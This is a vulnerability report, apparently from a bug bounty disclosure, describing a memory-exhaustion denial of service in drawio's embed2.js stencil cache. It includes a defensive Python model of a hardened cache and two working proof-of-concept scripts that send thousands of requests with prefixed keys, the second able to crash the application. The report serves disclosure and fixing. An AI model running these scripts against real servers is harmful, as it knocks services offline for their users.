Denial of Service on embed2 servlet in jgraph/drawio
Reported on
May 19th 2022
Description
The application stores a 5MB file in a hashmap variable using user input as the key; with a large number of requests it is possible to increase the memory usage of the application and deny access to the embed2.js stencils resource.
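To make the weakness concrete, here is an added model of the unbounded cache beside a hardened one; this is example code written for this page, not drawio's servlet, and KNOWN_STENCILS, the 5MB size, the class names and the allowlist rule are assumptions:

```python
import re
from collections import OrderedDict
# Constructed stand-ins (not drawio's code): the stencil names the server ships
# and the size of each cached stencil file as described in the report.
KNOWN_STENCILS = {"aws4", "aws3d"}
STENCIL_SIZE = 5 * 1024 * 1024
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")  # no '/', '.', bounded length


class NaiveStencilCache:
    """Models the weakness: the raw request parameter is the key, no bound."""
    def __init__(self):
        self.entries = {}

    def get(self, name):
        # "aws4", "./aws4" and "././aws4" become three keys for one file.
        if name not in self.entries:
            self.entries[name] = object()  # stand-in for the loaded stencil
        return self.entries[name]


class BoundedStencilCache:
    """Validates the key against an allowlist and caps the entry count."""
    def __init__(self, max_entries=8):
        self.entries = OrderedDict()
        self.max_entries = max_entries
        self.rejected = 0

    def get(self, name):
        # Reject before touching the cache: bad syntax or an unknown stencil
        # never becomes a key, so the key space is fixed by KNOWN_STENCILS.
        if not NAME_RE.match(name) or name not in KNOWN_STENCILS:
            self.rejected += 1
            return None
        if name not in self.entries:
            if len(self.entries) >= self.max_entries:
                self.entries.popitem(last=False)  # evict the oldest entry
            self.entries[name] = object()
        return self.entries[name]


def bytes_held(cache):
    """Memory pinned by a cache, at one stencil file per entry."""
    return len(cache.entries) * STENCIL_SIZE


def request_variants(cache, count, stencil="aws4"):
    """Feed `count` prefixed spellings of one stencil name; return bytes then held."""
    prefix = ""
    for _ in range(count):
        prefix += "./"
        cache.get(prefix + stencil)
    return bytes_held(cache)
```

With the naive cache every prefixed spelling pins another copy, while the bounded cache rejects all of them and can never hold more than the allowlisted stencils.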
Proof of Concept
import requests

# Request the aws4 stencil under a growing "/" prefix, so each request
# carries a new cache key.
HOST = "http://127.0.0.1:8080/embed2.js?s={0}aws4"
prefix = ""
for i in range(0, 1000):
    prefix += "/"
    r = requests.get(HOST.format(prefix))
    print(i)
Before the poc execution:
After:
I lowered the impact because I was not able to take down the application with this vulnerability, but after executing the PoC it is not possible to access the aws4 stencil anymore; this could be done to every stencil and deny access to every stencil:
Update on report
import requests

HOST = "http://127.0.0.1:8080/embed2.js?s={0}aws4"
prefix = ""
try:
    for i in range(0, 5000):
        prefix += "./"
        r = requests.get(HOST.format(prefix))
        print(i)
except requests.RequestException:
    # The first stencil stopped answering; continue with the next one.
    HOST = "http://127.0.0.1:8080/embed2.js?s={0}aws3d"
    try:
        for i in range(0, 5000):
            prefix += "./"
            r = requests.get(HOST.format(prefix))
            print(i)
    except requests.RequestException:
        pass
With this PoC I was able to take down the whole application.
Impact
Denial of access to the stencils resource.
Thanks for the report. How would you make the user request the URL so many times? Create a site with JS that makes them call it over and over?
Actually, it does not need user interaction: the attacker can do it by himself by executing the PoC payload.
Hi, after some changes I was able to take down the whole drawio application with the payload above, so I adjusted the score.